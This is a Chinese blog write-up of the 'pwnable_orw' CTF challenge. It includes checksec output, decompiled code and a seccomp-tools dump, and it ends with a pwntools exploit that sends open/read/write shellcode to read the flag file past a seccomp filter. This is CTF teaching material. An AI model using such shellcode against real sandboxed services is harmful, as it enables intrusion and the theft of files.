加载头像

pwnable_orw

Ubuntu 16 来源:https://github.com/bash-c/pwn_repo


0x01


checksec

1
2
3
4
5
6
7
[*] '/home/zelas/Desktop/pwn/pwnable_orw/orw'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found //canary保护
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments //存在rwx段

IDA

main()

1
2
3
4
5
6
7
8
int __cdecl main(int argc, const char **argv, const char **envp)
{
orw_seccomp();
printf("Give my your shellcode:");
read(0, &shellcode, 0xC8u);
((void (*)(void))shellcode)();
return 0;
}

orw_seccomp()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
unsigned int orw_seccomp()
{
__int16 v1; // [esp+4h] [ebp-84h] BYREF
char *v2; // [esp+8h] [ebp-80h]
char v3[96]; // [esp+Ch] [ebp-7Ch] BYREF
unsigned int v4; // [esp+6Ch] [ebp-1Ch]

v4 = __readgsdword(0x14u);
qmemcpy(v3, &unk_8048640, sizeof(v3));
v1 = 12;
v2 = v3;
prctl(38, 1, 0, 0, 0);
prctl(22, 2, &v1);
return __readgsdword(0x14u) ^ v4;
}

0x02


思路 orw (系统调用被禁用)

seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandboxing 机制。在 Linux 系统里,大量的系统调用(system call)直接暴露给用户态程序。但是,并不是所有的系统调用都被需要,而且不安全的代码滥用系统调用会对系统造成安全威胁。seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。

seccomp-tools可以分析程序的seccomp状态,哪些被系统被禁用了安装
安装流程:
sudo apt install gcc ruby-dev
gem install seccomp-tools

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ seccomp-tools dump ./orw 
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x09 0x40000003 if (A != ARCH_I386) goto 0011
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x07 0x00 0x000000ad if (A == rt_sigreturn) goto 0011
0004: 0x15 0x06 0x00 0x00000077 if (A == sigreturn) goto 0011
0005: 0x15 0x05 0x00 0x000000fc if (A == exit_group) goto 0011
0006: 0x15 0x04 0x00 0x00000001 if (A == exit) goto 0011
0007: 0x15 0x03 0x00 0x00000005 if (A == open) goto 0011
0008: 0x15 0x02 0x00 0x00000003 if (A == read) goto 0011
0009: 0x15 0x01 0x00 0x00000004 if (A == write) goto 0011
0010: 0x06 0x00 0x00 0x00050026 return ERRNO(38)
0011: 0x06 0x00 0x00 0x7fff0000 return ALLOW

shellcraft生成shellcode 完成相关调用

0x03


exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *

context(arch='i386', os='linux', log_level='debug')
path = './orw'
io = remote('node4.buuoj.cn', 29270)
# io = process([path])
# elf = ELF(path)
# libc = ELF('./libc-2.23.so')

shellcode = shellcraft.open('flag')
shellcode += shellcraft.read('eax', 'esp', 42) # 3 eax
shellcode += shellcraft.write(1, 'esp', 42)
payload = asm(shellcode)
io.sendline(payload)
io.recv()
io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體